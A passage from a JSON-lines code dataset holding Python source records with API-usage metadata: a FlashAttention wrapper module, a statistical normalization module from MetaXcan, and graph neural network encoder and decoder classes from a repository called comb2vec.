"name"}, {"api_name": "classes.files.YouTubeVideoFile", "line_number": 876, "usage_type": "call"}, {"api_name": "classes.files", "line_number": 876, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 910, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 911, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 914, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 915, "usage_type": "name"}]} +{"seq_id": "13546187859", "text": "# This file is the implementation of FlashAttention introduced in\n# \"FlashAttention: Fast and Memory-Efficient Exact Attention with IO-Awareness\"\n# Supported pattern of the code: Noncausal Self, Causal Self.\n# The code comes from https://github.com/HazyResearch/flash-attention.git.\n\nimport math\nfrom typing import Dict, Optional, Tuple\n\nimport torch\n# import flash_attn_cuda\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom efficient_attention import AbstractAttention, register_cls\nfrom efficient_attention.modules.multihead_attention import \\\n _append_prev_key_padding_mask\nfrom einops import rearrange, repeat\nfrom torch import Tensor\nfrom flash_attn.modules.mha import FlashSelfAttention, FlashCrossAttention\n\n\nclass FlashAttention(AbstractAttention):\n def __init__(self, embed_dim, num_heads, dropout=0.0, bias=True, **kwargs):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n assert self.embed_dim % num_heads == 0, \"self.kdim must be divisible by num_heads\"\n self.head_dim = self.embed_dim // num_heads\n assert self.head_dim in [16, 32, 64, 128], \"Only support head_dim == 16, 32, 64, or 128\"\n self.Wqkv = nn.Linear(embed_dim, 3 * embed_dim, bias=bias)\n\n self.inner_attn = FlashSelfAttention(causal=self.causal, attention_dropout=dropout, softmax_scale=self.head_dim ** -0.5)\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for proj in [self.k_proj, self.v_proj, self.q_proj, self.out_proj]:\n kwargs = {'gain': 1 / math.sqrt(2)} if proj is not self.out_proj else {}\n nn.init.xavier_uniform_(proj.weight, **kwargs)\n if proj.bias is not None:\n nn.init.constant_(proj.bias, 0.0)\n\n def forward(self, query,\n key=None,\n value=None,\n query_padding_mask: Optional[Tensor] = None,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = False,\n need_head_weights: bool = False,\n attn_mask: Optional[Tensor] = None,\n static_kv: bool = False,\n incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,\n batch_first: bool = False,\n **kwargs\n ) -> Tuple[Tensor, Optional[Tensor]]:\n x = query\n if not batch_first:\n x = torch.transpose(x, 0, 1)\n\n qkv = self.Wqkv(x)\n qkv = rearrange(qkv, 'b s (three h d) -> b s three h d', three=3, h=self.num_heads)\n context = self.inner_attn(qkv)\n context = rearrange(context, 'b s h d -> b s (h d)')\n\n attn = self.out_proj(context.transpose(1, 2)).transpose(1, 2)\n\n if not batch_first:\n attn = attn.transpose(0, 1)\n return attn, None\n", "repo_name": "Shark-NLP/CAB", "sub_path": "efficient-attention/efficient_attention/modules/flash_attn.py", "file_name": "flash_attn.py", "file_ext": "py", "file_size_in_byte": 2912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "61", "api": [{"api_name": "efficient_attention.AbstractAttention", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "flash_attn.modules.mha.FlashSelfAttention", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 58, "usage_type": "call"}, {"api_name": "einops.rearrange", "line_number": 61, "usage_type": "call"}, {"api_name": "einops.rearrange", "line_number": 63, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "2580023633", "text": "__author__ = 'heroico'\n\nimport numpy\nimport logging\nimport math\n\nNONE=\"none\"\nFROM_PHENO=\"from_pheno\"\nFROM_REFERENCE=\"from_reference\"\n\ndef normalizationScheme(scheme, covariances=None, weight_db_logic=None):\n n = None\n if scheme == NONE:\n n = NoNormalization()\n elif scheme == FROM_PHENO:\n n = _BetaNormalization()\n elif scheme == FROM_REFERENCE:\n n = _ReferenceNormalization(covariances, weight_db_logic)\n else:\n raise Exception(\"Unknown normalization: %s\", scheme if scheme else None)\n return n\n\nclass Normalization(object):\n def __init__(self):\n pass\n\n def update(self, beta_sets):\n pass\n\n def calculateNormalization(self):\n return 1\n\nclass NoNormalization(Normalization):\n pass\n\nclass _BetaNormalization(Normalization):\n def __init__(self):\n self.ses = []\n self.sigmas = []\n\n def update(self, beta_sets):\n se = beta_sets[\"se\"]\n self.ses.append(se)\n\n sigma = beta_sets[\"sigma_l\"]\n self.sigmas.append(sigma)\n\n def calculateNormalization(self):\n logging.info(\"Calculating normalization from phenotype\")\n y = []\n x = []\n for i, ses_data in enumerate(self.ses):\n logging.log(6,\"processing standard error %i\", i)\n sigma_data = self.sigmas[i]\n for j in xrange(0, len(ses_data.data)):\n se = ses_data.data[j]\n sigma = sigma_data.data[j]\n if se == \"NA\" or sigma == \"NA\":\n continue\n\n y.append(1/float(se))\n s = float(sigma)\n x.append(s)\n\n x = numpy.array(x)\n x = x[:,numpy.newaxis]\n y = numpy.array(y)\n a = numpy.linalg.lstsq(x,y)[0]\n return float(a)\n\nclass _ReferenceNormalization(Normalization):\n def __init__(self, covariances, weight_db_logic):\n self.ses = []\n self.covariances = covariances\n self.weight_db_logic = weight_db_logic\n\n def update(self, beta_sets):\n se = beta_sets[\"se\"]\n self.ses.append(se)\n\n def calculateNormalization(self):\n logging.info(\"Calculating normalization from reference\")\n y = []\n x = []\n for i, ses_data in enumerate(self.ses):\n for j in xrange(0, len(ses_data.data)):\n se = ses_data.data[j]\n if se == \"NA\":\n continue\n\n rsid = ses_data.keys[j]\n genes = self.weight_db_logic.genes_for_an_rsid[rsid]\n gene_count = len(genes)\n if not gene_count:\n logging.log(5, \"no genes for rsid %s, skipping\", rsid)\n continue\n\n entry = None\n for gene in genes:\n if gene in self.covariances:\n entry = self.covariances[gene]\n logging.log(5, \"picked gene %s for rsid %s from %d\", gene, rsid, gene_count)\n break\n\n if not entry:\n logging.log(8, \"rsid %s without proper covariance matrix, skipping\", rsid)\n continue\n\n covariance_matrix = entry[0]\n valid_rsids = entry[1]\n if not rsid in valid_rsids:\n logging.log(8, \"rsid %s not in covariance matrix, skipping\", rsid)\n continue\n\n index = valid_rsids.index(rsid)\n sigma = math.sqrt(covariance_matrix[index][index])\n s = float(sigma)\n x.append(s)\n\n y.append(1/float(se))\n\n x = numpy.array(x)\n x = x[:,numpy.newaxis]\n y = numpy.array(y)\n a = numpy.linalg.lstsq(x,y)[0]\n return float(a)\n", "repo_name": "hakyimlab/MetaXcan", "sub_path": "software/metax/deprecated/Normalization.py", "file_name": "Normalization.py", "file_ext": "py", "file_size_in_byte": 3764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.info", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 95, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 112, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 125, "usage_type": "attribute"}]} +{"seq_id": "5851052874", "text": "import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom ..utils import my_softmax, EPSILON\nfrom ..utils.distibutions import gumbel_softmax\n\n_EPS = EPSILON\n\n\nclass MLP(nn.Module):\n \"\"\"Two-layer fully-connected ELU net with batch norm.\"\"\"\n\n def __init__(self, n_in, n_hid, n_out, do_prob=0.):\n super(MLP, self).__init__()\n self.fc1 = nn.Linear(n_in, n_hid)\n self.fc2 = nn.Linear(n_hid, n_out)\n self.bn = nn.BatchNorm1d(n_out)\n self.dropout_prob = do_prob\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def batch_norm(self, inputs):\n \"\"\" All nodes are treated the same for normalization's sake\"\"\"\n x = inputs\n x = self.bn(x)\n return x\n\n def forward(self, inputs):\n # Input shape: [num_sims, num_things, num_features]\n x = F.elu(self.fc1(inputs))\n x = F.dropout(x, self.dropout_prob, training=self.training)\n x = F.elu(self.fc2(x))\n return self.batch_norm(x)\n\n\nclass CNN(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0.):\n super(CNN, self).__init__()\n self.pool = nn.MaxPool1d(kernel_size=2, stride=None, padding=0,\n dilation=1, return_indices=False,\n ceil_mode=False)\n\n self.conv1 = nn.Conv1d(n_in, n_hid, kernel_size=5, stride=1, padding=0)\n self.bn1 = nn.BatchNorm1d(n_hid)\n self.conv2 = nn.Conv1d(n_hid, n_hid, kernel_size=5, stride=1, padding=0)\n self.bn2 = nn.BatchNorm1d(n_hid)\n self.conv_predict = nn.Conv1d(n_hid, n_out, kernel_size=1)\n self.conv_attention = nn.Conv1d(n_hid, 1, kernel_size=1)\n self.dropout_prob = do_prob\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n n = m.kernel_size[0] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n m.bias.data.fill_(0.1)\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, inputs):\n # Input shape: [num_sims * num_edges, num_dims, num_timesteps]\n\n x = F.relu(self.conv1(inputs))\n x = self.bn1(x)\n x = F.dropout(x, self.dropout_prob, training=self.training)\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n pred = self.conv_predict(x)\n attention = my_softmax(self.conv_attention(x), axis=2)\n\n edge_prob = (pred * attention).mean(dim=2)\n return edge_prob\n\n\nclass MLPEncoder(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0., factor=True):\n super(MLPEncoder, self).__init__()\n\n self.factor = factor\n\n self.mlp1 = MLP(n_in, n_hid, n_hid, do_prob)\n self.mlp2 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n self.mlp3 = MLP(n_hid, n_hid, n_hid, do_prob)\n if self.factor:\n self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n print(\"Using factor graph MLP encoder.\")\n else:\n self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n print(\"Using MLP encoder.\")\n self.fc_out = nn.Linear(n_hid * 2, n_out)\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def edge2node(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n incoming = torch.matmul(rel_rec.t(), x)\n return incoming / incoming.size(1)\n\n def node2edge(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n receivers = torch.matmul(rel_rec, x)\n senders = torch.matmul(rel_send, x)\n edges = torch.cat([receivers, senders], dim=1)\n return edges\n\n def forward(self, input, rel_rec, rel_send):\n\n x = input.view(input.size(0) * input.size(1), -1)\n\n x = self.mlp1(x) # 2-layer ELU net per node\n\n x = self.node2edge(x, rel_rec, rel_send)\n x = self.mlp2(x)\n x = self.edge2node(x, rel_rec, rel_send)\n x_skip = x\n x = self.mlp3(x)\n x = self.node2edge(x, rel_rec, rel_send)\n x = self.mlp4(x)\n x = self.edge2node(x, rel_rec, rel_send)\n x = torch.cat((x, x_skip), dim=1) # Skip connection\n\n output = self.fc_out(x)\n\n return output.view(input.size(0), input.size(1), -1)\n\n\nclass SolutionFaeture(nn.Module):\n\n def __init__(self, feature_size, n_hid, n_out, do_prob=0.):\n super(SolutionFaeture, self).__init__()\n self.mlp1 = MLP(feature_size, n_hid, n_hid, do_prob)\n self.fc_out = nn.Linear(n_hid, n_out)\n\n self.bce_loss = nn.BCEWithLogitsLoss(size_average=True)\n\n def forward(self, solution_codes):\n x = self.mlp1(solution_codes)\n return self.fc_out(x)\n\n\nclass CNNEncoder(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0., factor=True):\n super(CNNEncoder, self).__init__()\n self.dropout_prob = do_prob\n\n self.factor = factor\n\n self.cnn = CNN(n_in * 2, n_hid, n_hid, do_prob)\n self.mlp1 = MLP(n_hid, n_hid, n_hid, do_prob)\n self.mlp2 = MLP(n_hid, n_hid, n_hid, do_prob)\n self.mlp3 = MLP(n_hid * 3, n_hid, n_hid, do_prob)\n self.fc_out = nn.Linear(n_hid, n_out)\n\n if self.factor:\n print(\"Using factor graph CNN encoder.\")\n else:\n print(\"Using CNN encoder.\")\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def node2edge_temporal(self, inputs, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n\n x = inputs.view(inputs.size(0), inputs.size(1), -1)\n\n receivers = torch.matmul(rel_rec, x)\n receivers = receivers.view(inputs.size(0) * receivers.size(1),\n inputs.size(2), inputs.size(3))\n receivers = receivers.transpose(2, 1)\n\n senders = torch.matmul(rel_send, x)\n senders = senders.view(inputs.size(0) * senders.size(1),\n inputs.size(2),\n inputs.size(3))\n senders = senders.transpose(2, 1)\n\n # receivers and senders have shape:\n # [num_sims * num_edges, num_dims, num_timesteps]\n edges = torch.cat([receivers, senders], dim=1)\n return edges\n\n def edge2node(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n incoming = torch.matmul(rel_rec.t(), x)\n return incoming / incoming.size(1)\n\n def node2edge(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n receivers = torch.matmul(rel_rec, x)\n senders = torch.matmul(rel_send, x)\n edges = torch.cat([receivers, senders], dim=2)\n return edges\n\n def forward(self, inputs, rel_rec, rel_send):\n\n # Input has shape: [num_sims, num_atoms, num_timesteps, num_dims]\n edges = self.node2edge_temporal(inputs, rel_rec, rel_send)\n x = self.cnn(edges)\n x = x.view(inputs.size(0), (inputs.size(1) - 1) * inputs.size(1), -1)\n x = self.mlp1(x)\n x_skip = x\n\n if self.factor:\n x = self.edge2node(x, rel_rec, rel_send)\n x = self.mlp2(x)\n\n x = self.node2edge(x, rel_rec, rel_send)\n x = torch.cat((x, x_skip), dim=2) # Skip connection\n x = self.mlp3(x)\n\n return self.fc_out(x)\n\n\nclass MLPDecoder(nn.Module):\n \"\"\"MLP decoder module.\"\"\"\n\n def __init__(self, n_in_node, edge_types, msg_hid, msg_out, n_hid,\n do_prob=0., skip_first=False):\n super(MLPDecoder, self).__init__()\n self.msg_fc1 = nn.ModuleList(\n [nn.Linear(2 * n_in_node, msg_hid) for _ in range(edge_types)])\n self.msg_fc2 = nn.ModuleList(\n [nn.Linear(msg_hid, msg_out) for _ in range(edge_types)])\n self.msg_out_shape = msg_out\n self.skip_first_edge_type = skip_first\n\n self.out_fc1 = nn.Linear(n_in_node + msg_out, n_hid)\n self.out_fc2 = nn.Linear(n_hid, n_hid)\n self.out_fc3 = nn.Linear(n_hid, n_in_node)\n\n print('Using learned interaction net decoder.')\n\n self.dropout_prob = do_prob\n\n def single_step_forward(self, single_timestep_inputs, rel_rec, rel_send,\n single_timestep_rel_type):\n\n # single_timestep_inputs has shape\n # [batch_size, num_timesteps, num_atoms, num_dims]\n\n # single_timestep_rel_type has shape:\n # [batch_size, num_timesteps, num_atoms*(num_atoms-1), num_edge_types]\n\n # Node2edge\n receivers = torch.matmul(rel_rec, single_timestep_inputs)\n senders = torch.matmul(rel_send, single_timestep_inputs)\n pre_msg = torch.cat([receivers, senders], dim=-1)\n\n all_msgs = Variable(torch.zeros(pre_msg.size(0), pre_msg.size(1),\n pre_msg.size(2), self.msg_out_shape))\n if single_timestep_inputs.is_cuda:\n all_msgs = all_msgs.cuda()\n\n if self.skip_first_edge_type:\n start_idx = 1\n else:\n start_idx = 0\n\n # Run separate MLP for every edge type\n # NOTE: To exlude one edge type, simply offset range by 1\n for i in range(start_idx, len(self.msg_fc2)):\n msg = F.relu(self.msg_fc1[i](pre_msg))\n msg = F.dropout(msg, p=self.dropout_prob)\n msg = F.relu(self.msg_fc2[i](msg))\n msg = msg * single_timestep_rel_type[:, :, :, i:i + 1]\n all_msgs += msg\n\n # Aggregate all msgs to receiver\n agg_msgs = all_msgs.transpose(-2, -1).matmul(rel_rec).transpose(-2, -1)\n agg_msgs = agg_msgs.contiguous()\n\n # Skip connection\n aug_inputs = torch.cat([single_timestep_inputs, agg_msgs], dim=-1)\n\n # Output MLP\n pred = F.dropout(F.relu(self.out_fc1(aug_inputs)), p=self.dropout_prob)\n pred = F.dropout(F.relu(self.out_fc2(pred)), p=self.dropout_prob)\n pred = self.out_fc3(pred)\n\n # Predict position/velocity difference\n return single_timestep_inputs + pred\n\n def forward(self, inputs, rel_type, rel_rec, rel_send, pred_steps=1):\n # NOTE: Assumes that we have the same graph across all samples.\n\n inputs = inputs.transpose(1, 2).contiguous()\n\n sizes = [rel_type.size(0), inputs.size(1), rel_type.size(1),\n rel_type.size(2)]\n rel_type = rel_type.unsqueeze(1).expand(sizes)\n\n time_steps = inputs.size(1)\n assert (pred_steps <= time_steps)\n preds = []\n\n # Only take n-th timesteps as starting points (n: pred_steps)\n last_pred = inputs[:, 0::pred_steps, :, :]\n curr_rel_type = rel_type[:, 0::pred_steps, :, :]\n # NOTE: Assumes rel_type is constant (i.e. same across all time steps).\n\n # Run n prediction steps\n for step in range(0, pred_steps):\n last_pred = self.single_step_forward(last_pred, rel_rec, rel_send,\n curr_rel_type)\n preds.append(last_pred)\n\n sizes = [preds[0].size(0), preds[0].size(1) * pred_steps,\n preds[0].size(2), preds[0].size(3)]\n\n output = Variable(torch.zeros(sizes))\n if inputs.is_cuda:\n output = output.cuda()\n\n # Re-assemble correct timeline\n for i in range(len(preds)):\n output[:, i::pred_steps, :, :] = preds[i]\n\n pred_all = output[:, :(inputs.size(1) - 1), :, :]\n\n return pred_all.transpose(1, 2).contiguous()\n\n\nclass RNNDecoder(nn.Module):\n \"\"\"Recurrent decoder module.\"\"\"\n\n def __init__(self, n_in_node, edge_types, n_hid,\n do_prob=0., skip_first=False):\n super(RNNDecoder, self).__init__()\n self.msg_fc1 = nn.ModuleList(\n [nn.Linear(2 * n_hid, n_hid) for _ in range(edge_types)])\n self.msg_fc2 = nn.ModuleList(\n [nn.Linear(n_hid, n_hid) for _ in range(edge_types)])\n self.msg_out_shape = n_hid\n self.skip_first_edge_type = skip_first\n\n self.hidden_r = nn.Linear(n_hid, n_hid, bias=False)\n self.hidden_i = nn.Linear(n_hid, n_hid, bias=False)\n self.hidden_h = nn.Linear(n_hid, n_hid, bias=False)\n\n self.input_r = nn.Linear(n_in_node, n_hid, bias=True)\n self.input_i = nn.Linear(n_in_node, n_hid, bias=True)\n self.input_n = nn.Linear(n_in_node, n_hid, bias=True)\n\n self.out_fc1 = nn.Linear(n_hid, n_hid)\n self.out_fc2 = nn.Linear(n_hid, n_hid)\n self.out_fc3 = nn.Linear(n_hid, n_in_node)\n\n print('Using learned recurrent interaction net decoder.')\n\n self.dropout_prob = do_prob\n\n def single_step_forward(self, inputs, rel_rec, rel_send,\n rel_type, hidden):\n\n # node2edge\n receivers = torch.matmul(rel_rec, hidden)\n senders = torch.matmul(rel_send, hidden)\n pre_msg = torch.cat([receivers, senders], dim=-1)\n\n all_msgs = Variable(torch.zeros(pre_msg.size(0), pre_msg.size(1),\n self.msg_out_shape))\n if inputs.is_cuda:\n all_msgs = all_msgs.cuda()\n\n if self.skip_first_edge_type:\n start_idx = 1\n norm = float(len(self.msg_fc2)) - 1.\n else:\n start_idx = 0\n norm = float(len(self.msg_fc2))\n\n # Run separate MLP for every edge type\n # NOTE: To exlude one edge type, simply offset range by 1\n for i in range(start_idx, len(self.msg_fc2)):\n msg = F.tanh(self.msg_fc1[i](pre_msg))\n msg = F.dropout(msg, p=self.dropout_prob)\n msg = F.tanh(self.msg_fc2[i](msg))\n msg = msg * rel_type[:, :, i:i + 1]\n all_msgs += msg / norm\n\n agg_msgs = all_msgs.transpose(-2, -1).matmul(rel_rec).transpose(-2,\n -1)\n agg_msgs = agg_msgs.contiguous() / inputs.size(2) # Average\n\n # GRU-style gated aggregation\n r = F.sigmoid(self.input_r(inputs) + self.hidden_r(agg_msgs))\n i = F.sigmoid(self.input_i(inputs) + self.hidden_i(agg_msgs))\n n = F.tanh(self.input_n(inputs) + r * self.hidden_h(agg_msgs))\n hidden = (1 - i) * n + i * hidden\n\n # Output MLP\n pred = F.dropout(F.relu(self.out_fc1(hidden)), p=self.dropout_prob)\n pred = F.dropout(F.relu(self.out_fc2(pred)), p=self.dropout_prob)\n pred = self.out_fc3(pred)\n\n # Predict position/velocity difference\n pred = inputs + pred\n\n return pred, hidden\n\n def forward(self, data, rel_type, rel_rec, rel_send, pred_steps=1,\n burn_in=False, burn_in_steps=1, dynamic_graph=False,\n encoder=None, temp=None):\n\n inputs = data.transpose(1, 2).contiguous()\n\n time_steps = inputs.size(1)\n\n # inputs has shape\n # [batch_size, num_timesteps, num_atoms, num_dims]\n\n # rel_type has shape:\n # [batch_size, num_atoms*(num_atoms-1), num_edge_types]\n\n hidden = Variable(\n torch.zeros(inputs.size(0), inputs.size(2), self.msg_out_shape))\n if inputs.is_cuda:\n hidden = hidden.cuda()\n\n pred_all = []\n\n for step in range(0, inputs.size(1) - 1):\n\n if burn_in:\n if step <= burn_in_steps:\n ins = inputs[:, step, :, :]\n else:\n ins = pred_all[step - 1]\n else:\n assert (pred_steps <= time_steps)\n # Use ground truth trajectory input vs. last prediction\n if not step % pred_steps:\n ins = inputs[:, step, :, :]\n else:\n ins = pred_all[step - 1]\n\n if dynamic_graph and step >= burn_in_steps:\n # NOTE: Assumes burn_in_steps = args.timesteps\n logits = encoder(\n data[:, :, step - burn_in_steps:step, :].contiguous(),\n rel_rec, rel_send)\n rel_type = gumbel_softmax(logits, tau=temp, hard=True)\n\n pred, hidden = self.single_step_forward(ins, rel_rec, rel_send,\n rel_type, hidden)\n pred_all.append(pred)\n\n preds = torch.stack(pred_all, dim=1)\n\n return preds.transpose(1, 2).contiguous()\n", "repo_name": "gaxler/comb2vec", "sub_path": "comb2vec/models/graph_nn.py", "file_name": "graph_nn.py", "file_ext": "py", "file_size_in_byte": 17118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.EPSILON", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.functional.elu", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.functional.elu", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.my_softmax", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.Linear", 